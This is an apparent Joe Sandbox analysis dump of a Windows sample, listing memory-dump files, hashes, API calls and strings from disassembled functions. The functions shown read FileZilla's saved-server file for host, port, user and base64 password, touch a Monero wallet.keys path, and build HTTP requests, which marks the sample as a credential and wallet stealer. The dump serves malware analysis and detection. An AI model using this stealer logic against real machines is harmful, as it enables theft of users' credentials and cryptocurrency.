Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59cb5d6fd5f3413860f6818653a63452e8c35741f960b04934f8003684b99c66
Instruction ID: 1da077e40348592c61bd700154757731abcc6ff62976dff3b7023462d5928e7d
Opcode Fuzzy Hash: 59cb5d6fd5f3413860f6818653a63452e8c35741f960b04934f8003684b99c66
Instruction Fuzzy Hash: F951D2B250C221DFD3046F28F98567ABBF4EF48360F26493EE5CA93304D63198419B97

Function 009414CB Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ac420b39913ae61a1ad705c179f535c4a9328dee334f2e18756432b4663f478
Instruction ID: 56d15c041a8b11c31bc76c05474057ad9317f4e658e93a633d67276a3f8cfb63
Opcode Fuzzy Hash: 8ac420b39913ae61a1ad705c179f535c4a9328dee334f2e18756432b4663f478
Instruction Fuzzy Hash: FB414AF3A08214ABE30C6A28DC5677AF7D5EF90350F2A853DE6C693380ED7858058386

Function 00666799 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
Instruction ID: 262e54794228a5a9ad63bd80da84602d58c8bbaa4e2f2699c2ebe203f97bf30c
Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
Instruction Fuzzy Hash: 93513C62E09BD589C7058B7584502EEBFB21FE6210F1E839ED4981F383C3755689D3E5

Function 00939B4C Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f134400bfb0ee4c43a81ad4c055929d1c37cae1e51d2636eccd19dfb181316
Instruction ID: de9f17089722c329b16389f2a5120272bf500d4d02c3ea347cae23a15a9f0822
Opcode Fuzzy Hash: 44f134400bfb0ee4c43a81ad4c055929d1c37cae1e51d2636eccd19dfb181316
Instruction Fuzzy Hash: C03137F3E082144BF318A929DC04777B6D69BD4321F2B823DDE8993784ED392D0542CA

Function 006375A8 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54

Function 00609AA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 006003B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 00608F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00608F9B

Part of subcall function 0060AC30: lstrcpy.KERNEL32(00000000,?), ref: 0060AC82
Part of subcall function 0060AC30: lstrcat.KERNEL32(00000000), ref: 0060AC92

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0060AAF6

Part of subcall function 005FA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005FA13C
Part of subcall function 005FA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005FA161
Part of subcall function 005FA110: LocalAlloc.KERNEL32(00000040,?), ref: 005FA181
Part of subcall function 005FA110: ReadFile.KERNEL32(000000FF,?,00000000,005F148F,00000000), ref: 005FA1AA
Part of subcall function 005FA110: LocalFree.KERNEL32(005F148F), ref: 005FA1E0
Part of subcall function 005FA110: CloseHandle.KERNEL32(000000FF), ref: 005FA1EA

Part of subcall function 00608FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00608FE2

GetProcessHeap.KERNEL32(00000000,000F423F,00610DBF,00610DBE,00610DBB,00610DBA), ref: 006004C2
RtlAllocateHeap.NTDLL(00000000), ref: 006004C9
StrStrA.SHLWAPI(00000000,<Host>), ref: 006004E5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB7), ref: 006004F3
StrStrA.SHLWAPI(00000000,<Port>), ref: 0060052F
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB7), ref: 0060053D
StrStrA.SHLWAPI(00000000,<User>), ref: 00600579
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB7), ref: 00600587
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 006005C3
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB7), ref: 006005D5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB7), ref: 00600662
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB7), ref: 0060067A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB7), ref: 00600692
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB7), ref: 006006AA
lstrcat.KERNEL32(?,browser: FileZilla), ref: 006006C2
lstrcat.KERNEL32(?,profile: null), ref: 006006D1
lstrcat.KERNEL32(?,url: ), ref: 006006E0
lstrcat.KERNEL32(?,00000000), ref: 006006F3
lstrcat.KERNEL32(?,00611770), ref: 00600702
lstrcat.KERNEL32(?,00000000), ref: 00600715
lstrcat.KERNEL32(?,00611774), ref: 00600724
lstrcat.KERNEL32(?,login: ), ref: 00600733
lstrcat.KERNEL32(?,00000000), ref: 00600746
lstrcat.KERNEL32(?,00611780), ref: 00600755
lstrcat.KERNEL32(?,password: ), ref: 00600764
lstrcat.KERNEL32(?,00000000), ref: 00600777
lstrcat.KERNEL32(?,00611790), ref: 00600786
lstrcat.KERNEL32(?,00611794), ref: 00600795
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB7), ref: 006007EE

Strings

<Pass encoding="base64">, xrefs: 006005BA
browser: FileZilla, xrefs: 006006B9
<Host>, xrefs: 006004DC
<Port>, xrefs: 00600526
<User>, xrefs: 00600570
profile: null, xrefs: 006006C8
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 00600404
url: , xrefs: 006006D7
login: , xrefs: 0060072A
password: , xrefs: 0060075B

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: ebe3861569f497ed446ee1ca867cbf86c9f9926e824ccc4fc31c054d7519c6d3
Instruction ID: 2377fffcf39e7b1da504d1af2c7911485432e5a440e78be5ab4d001522978ad4
Opcode Fuzzy Hash: ebe3861569f497ed446ee1ca867cbf86c9f9926e824ccc4fc31c054d7519c6d3
Instruction Fuzzy Hash: CDD11B72950208ABDB48FBF0DD96EEFB73AAF14340F448558F102A61D1EF74AA44CB65

Function 005F59B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0060AAF6

Part of subcall function 005F4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005F4889
Part of subcall function 005F4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 005F4899

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005F5A48
StrCmpCA.SHLWAPI(?,00F4FD10), ref: 005F5A63
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005F5BE3
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00F4FC60,00000000,?,00F4EE30,00000000,?,00611B4C), ref: 005F5EC1
lstrlen.KERNEL32(00000000), ref: 005F5ED2
GetProcessHeap.KERNEL32(00000000,?), ref: 005F5EE3
RtlAllocateHeap.NTDLL(00000000), ref: 005F5EEA
lstrlen.KERNEL32(00000000), ref: 005F5EFF
lstrlen.KERNEL32(00000000), ref: 005F5F28
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 005F5F41
lstrlen.KERNEL32(00000000,?,?), ref: 005F5F6B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 005F5F7F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 005F5F9C
InternetCloseHandle.WININET(00000000), ref: 005F6000
InternetCloseHandle.WININET(00000000), ref: 005F600D
HttpOpenRequestA.WININET(00000000,00F4FC10,?,00F4F4E8,00000000,00000000,00400100,00000000), ref: 005F5C48

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

Part of subcall function 0060AC30: lstrcpy.KERNEL32(00000000,?), ref: 0060AC82
Part of subcall function 0060AC30: lstrcat.KERNEL32(00000000), ref: 0060AC92

InternetCloseHandle.WININET(00000000), ref: 005F6017

Strings

------, xrefs: 005F5C5B
------, xrefs: 005F5AE6
", xrefs: 005F5D25
------, xrefs: 005F5D9C
", xrefs: 005F5E66

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: 1e517d8a1a53f8957d3c310aaa6dae0b55ab96a31be7f7fee2a3974be52cc16a
Instruction ID: 4cdb8a428392a1c9f96f83cebd658336e6e5fb71dfbbc9e70cd1f298b9d99a8e
Opcode Fuzzy Hash: 1e517d8a1a53f8957d3c310aaa6dae0b55ab96a31be7f7fee2a3974be52cc16a
Instruction Fuzzy Hash: E112CA71960218ABDB59FBE0DCA5FEFB37ABF14740F404599B106620D1EF702A88CB59

Function 005FCFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

Part of subcall function 00608CF0: GetSystemTime.KERNEL32(00610E1B,00F4EF50,006105B6,?,?,005F13F9,?,0000001A,00610E1B,00000000,?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 00608D16

Part of subcall function 0060AC30: lstrcpy.KERNEL32(00000000,?), ref: 0060AC82
Part of subcall function 0060AC30: lstrcat.KERNEL32(00000000), ref: 0060AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005FD083
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 005FD1C7
RtlAllocateHeap.NTDLL(00000000), ref: 005FD1CE
lstrcat.KERNEL32(?,00000000), ref: 005FD308
lstrcat.KERNEL32(?,00611570), ref: 005FD317
lstrcat.KERNEL32(?,00000000), ref: 005FD32A
lstrcat.KERNEL32(?,00611574), ref: 005FD339
lstrcat.KERNEL32(?,00000000), ref: 005FD34C
lstrcat.KERNEL32(?,00611578), ref: 005FD35B
lstrcat.KERNEL32(?,00000000), ref: 005FD36E
lstrcat.KERNEL32(?,0061157C), ref: 005FD37D
lstrcat.KERNEL32(?,00000000), ref: 005FD390
lstrcat.KERNEL32(?,00611580), ref: 005FD39F
lstrcat.KERNEL32(?,00000000), ref: 005FD3B2
lstrcat.KERNEL32(?,00611584), ref: 005FD3C1
lstrcat.KERNEL32(?,00000000), ref: 005FD3D4
lstrcat.KERNEL32(?,00611588), ref: 005FD3E3

Part of subcall function 0060AB30: lstrlen.KERNEL32(005F4F55,?,?,005F4F55,00610DDF), ref: 0060AB3B
Part of subcall function 0060AB30: lstrcpy.KERNEL32(00610DDF,00000000), ref: 0060AB95

lstrlen.KERNEL32(?), ref: 005FD42A
lstrlen.KERNEL32(?), ref: 005FD439

Part of subcall function 0060AD80: StrCmpCA.SHLWAPI(00000000,00611568,005FD2A2,00611568,00000000), ref: 0060AD9F

DeleteFileA.KERNEL32(00000000), ref: 005FD4B4

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 40648317805c8f3800915526077813a99b70d3b686101e4d80220d39f61f07d8
Instruction ID: aa8b57586e01af61bc861c9d113008438163307941bc3370b5e4438973498f1e
Opcode Fuzzy Hash: 40648317805c8f3800915526077813a99b70d3b686101e4d80220d39f61f07d8
Instruction Fuzzy Hash: 42E10C71950208ABCB48FBE0DD96EEF773ABF54341F504558F106660E1EF31AA48CB6A

Function 005FCA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 0060AC30: lstrcpy.KERNEL32(00000000,?), ref: 0060AC82
